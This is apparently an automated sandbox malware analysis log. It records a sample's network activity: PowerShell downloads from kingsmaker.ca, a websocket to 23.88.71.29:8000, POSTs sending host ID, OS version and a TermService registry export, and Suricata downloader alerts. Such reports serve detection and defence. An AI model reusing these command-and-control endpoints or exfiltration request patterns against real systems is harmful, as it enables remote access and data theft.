        Networking

        barindex
        Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmpString found in memory: <&nbsp;&nbsp;&nbsp;"><a href="http://style="float:left;concerned with the=http%3A%2F%2Fwww.in popular culturetype="text/css" />it is possible to Harvard Universitytylesheet" href="/the main characterOxford University name="keywords" cstyle="text-align:the United Kingdomfederal government<div style="margin depending on the description of the<div class="header.min.js"></script>destruction of theslightly differentin accordance withtelecommunicationsindicates that theshortly thereafterespecially in the European countriesHowever, there aresrc="http://staticsuggested that the" src="http://www.a large number of Telecommunications" rel="nofollow" tHoly Roman Emperoralmost exclusively" border="0" alt="Secretary of Stateculminating in theCIA World Factbookthe most importantanniversary of thestyle="background-<li><em><a href="/the Atlantic Oceanstrictly speaking,shortly before thedifferent types ofthe Ottoman Empire><img src="http://An Introduction toconsequence of thedeparture from theConfederate Statesindigenous peoplesProceedings of theinformation on thetheories have beeninvolvement in thedivided into threeadjacent countriesis responsible fordissolution of thecollaboration withwidely regarded ashis contemporariesfounding member ofDominican Republicgenerally acceptedthe possibility ofare also availableunder constructionrestoration of thethe general publicis almost entirelypasses through thehas been suggestedcomputer and videoGermanic languages according to the different from theshortly afterwardshref="https://www.recent developmentBoard of Directors<div class="search| <a href="http://In particular, theMultiple footnotesor other substancethousands of yearstranslation of the</div>
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 8000
        Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49765
        Source: global trafficTCP traffic: 192.168.11.30:49763 -> 23.88.71.29:8000
        Source: global trafficHTTP traffic detected: GET /StaticFile/RdpService/79 HTTP/1.1Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: GET /StaticFile/TermServiceTryRun/72 HTTP/1.1Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: HypkmC7LuEqn6kjELov16g==Sec-WebSocket-Version: 13
        Source: global trafficHTTP traffic detected: POST /api/registry HTTP/1.1Host: 23.88.71.29:8000Connection: Keep-AliveContent-Type: application/jsonContent-Length: 102Data Raw: 22 45 43 41 34 45 37 46 36 34 35 43 45 41 42 43 46 31 34 31 44 36 30 32 43 43 33 30 38 39 36 37 32 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22 Data Ascii: "ECA4E7F645CEABCF141D602CC3089672|Microsoft Windows 10 Pro|10.0.19042 N/A Build 19042-10.0.19041.1081"
        Source: global trafficHTTP traffic detected: POST /api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2 HTTP/1.1Host: 23.88.71.29:8000Connection: Keep-AliveContent-Type: multipart/form-data; boundary=---------------------8dd10236a5b037dContent-Length: 5689Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 32 33 36 61 35 62 30 33 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73 00 5c 00 54 00 65 00 72 00 6d 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 5d 00 0d 00 0a 00 22 00 44 00 65 00 70 00 65 00 6e 00 64 00 4f 00 6e 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 22 00 3d 00 68 00 65 00 78 00 28 00 37 00 29 00 3a 00 35 00 32 00 2c 00 30 00 30 00 2c 00 35 00 30 00 2c 00 30 00 30 00 2c 00 34 00 33 00 2c 00 30 00 30 00 2c 00 35 00 33 00 2c 00 30 00 30 00 2c 00 35 00 33 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 0d 00 0a 00 22 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6f 00 6e 00 22 00 3d 00 22 00 40 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 5c 00 74 00 65 00 72 00 6d 00 73 00 72 00 76 00 2e 00 64 00 6c 00 6c 00 2c 00 2d 00 32 00 36 00 37 00 22 00 0d 00 0a 00 22 00 44 00 69 00 73 00 70 00 6c 00 61 00 79 00 4e 00 61 00 6d 00 65 00 22 00 3d 00 22 00 40 00 25 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 25 00 5c 00 5c 00 53 00 79 00 73 00 74 00 65 00 6d 00 33 00 32 00 5c 00 5c 00 74 00 65 00 72 00 6d 00 73 00 72 00 76 00 2e 00 64 00 6c 00 6c 00 2c 00 2d 00 32 00 36 00 38 00 22 00 0d 00 0a 00 22 00 45 00 72 00 72 00 6f 00 72 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 22 00 3d 00 64 00 77 00 6f 00 72 00 64 00 3a 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 31 00 0d 00 0a 00 22 00 46 00 61 00 69 00 6c 00 75 00 72 00 65 00 41 00 63 00 74 00 69 00 6f 00 6e 00 73 00 22 00 3d 00 68 00 65 00 78 00 3a 00 38 00 30 00 2c 00 35 00 31 00 2c 00 30 00 31 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 30 00 2c 00 30 00 33 00
        Source: Joe Sandbox ViewIP Address: 172.64.41.3 172.64.41.3
        Source: Joe Sandbox ViewIP Address: 23.88.71.29 23.88.71.29
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49739 -> 172.67.179.67:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49737 -> 172.67.179.67:443
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.30:49755 -> 172.67.179.67:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49761 -> 172.67.179.67:443
        Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.30:49766 -> 172.67.179.67:443
        Source: global trafficHTTP traffic detected: GET /file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb87ec64b75eef9f6703a3eb783bfa9ee7e92345daa3a62b976fb3d4ee238d363a7b5e9cf6d398cb37e4de3d85ec1f5daf0cf8c35fefe5c7fdd20dd092/Windows%20Defender/16/16/user/189 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde6507104fb3a8f8b397151 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 302
        Source: global trafficHTTP traffic detected: GET /file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729e39fac87f28f57d7357bf36e5b49f2b0cebc3bd94dba368f30a45afe0e99900e907285cf47daec2a455aa74b10f8070ac6411a1ed0d9940ffd7d6a2b24ff6d400df08dbb5e2d0894c9d90c9a HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66ff68cb5bc7a7adc6c2dde79a5e11323d HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 302
        Source: global trafficHTTP traffic detected: GET /file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e77e09a45c8c93401cf2bf452c6f70bca155b8ef39c0202e72ce5c5f4083673a0b5386ffd139c7d42f2ea2005be8516f5ad829f94abeab8f7fe32ba02b88e44df5b04afca3c479a650327a20a9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 85
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 86
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 62
        Source: global trafficHTTP traffic detected: GET /file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db115da9503bff5f3eb63dd5c8b58a4edbb94e89e961ebecca194b9e0e9e7656d46736c256bfc8b3dc86635484638b966bdfe9f1621daa6f792b5a53044675d929c45f5b8ee476604bf020ab6dd8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 140
        Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.3.20269 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 69
        Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa66742445be33750b633b56ea7f99bbb29fdde9b913e810a43e3fb7fc67f0c3fa02ef9b3c2868997a0d2ca950c4eb32e3b408791f34e135b54dbce6fa1a4c76 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 200
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 97
        Source: global trafficHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 64
        Source: unknownTCP traffic detected without corresponding DNS query: 23.204.249.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.204.249.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.204.249.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.204.249.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.204.249.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.204.249.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.204.249.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.204.249.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.204.249.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.204.249.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.204.249.81
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownTCP traffic detected without corresponding DNS query: 23.88.71.29
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb87ec64b75eef9f6703a3eb783bfa9ee7e92345daa3a62b976fb3d4ee238d363a7b5e9cf6d398cb37e4de3d85ec1f5daf0cf8c35fefe5c7fdd20dd092/Windows%20Defender/16/16/user/189 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729e39fac87f28f57d7357bf36e5b49f2b0cebc3bd94dba368f30a45afe0e99900e907285cf47daec2a455aa74b10f8070ac6411a1ed0d9940ffd7d6a2b24ff6d400df08dbb5e2d0894c9d90c9a HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: GET /file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e77e09a45c8c93401cf2bf452c6f70bca155b8ef39c0202e72ce5c5f4083673a0b5386ffd139c7d42f2ea2005be8516f5ad829f94abeab8f7fe32ba02b88e44df5b04afca3c479a650327a20a9 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: GET /file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db115da9503bff5f3eb63dd5c8b58a4edbb94e89e961ebecca194b9e0e9e7656d46736c256bfc8b3dc86635484638b966bdfe9f1621daa6f792b5a53044675d929c45f5b8ee476604bf020ab6dd8 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.3.20269 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
        Source: global trafficHTTP traffic detected: GET /file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa66742445be33750b633b56ea7f99bbb29fdde9b913e810a43e3fb7fc67f0c3fa02ef9b3c2868997a0d2ca950c4eb32e3b408791f34e135b54dbce6fa1a4c76 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: GET /StaticFile/RdpService/79 HTTP/1.1Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: GET /StaticFile/TermServiceTryRun/72 HTTP/1.1Host: kingsmaker.ca
        Source: global trafficHTTP traffic detected: GET /api/check HTTP/1.1Host: kingsmaker.caConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /client/ws HTTP/1.1Host: 23.88.71.29:8000Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: HypkmC7LuEqn6kjELov16g==Sec-WebSocket-Version: 13
        Source: global trafficDNS traffic detected: DNS query: kingsmaker.ca
        Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
        Source: unknownHTTP traffic detected: POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde6507104fb3a8f8b397151 HTTP/1.1Content-Type: application/jsonUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kingsmaker.caContent-Length: 302
        Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://.css
        Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://.jpg
        Source: powershell.exe, 00000001.00000002.3166238726.000001C838C98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3074920696.0000015B6D466000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4121286821.000001BD75897000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4406842789.000002934A650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D359F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: powershell.exe, 00000001.00000002.3166238726.000001C838C98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3074920696.0000015B6D466000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4121286821.000001BD75897000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4406842789.000002934A650000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D359F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: powershell.exe, 00000005.00000002.3076016059.0000015B6D570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
        Source: powershell.exe, 00000005.00000002.3076016059.0000015B6D570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
        Source: powershell.exe, 00000005.00000002.3077551508.0000015B6D871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.co
        Source: powershell.exe, 00000014.00000002.3349142454.00000186B9B6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
        Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://html4/loose.dtd
        Source: powershell.exe, 00000009.00000002.3329091603.000001BD019FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kingsmaker.ca
        Source: svczHost.exe, 00000010.00000002.4401647954.00000252B68A9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://kingsmaker.ca:443/x
        Source: powershell.exe, 00000001.00000002.3157492838.000001C830D57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3157492838.000001C830BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3071558533.0000015B653A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3717438428.00000186D3627000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B56806000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B56831000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngh
        Source: powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0057F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: svczHost.exe, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exeString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
        Source: powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidY
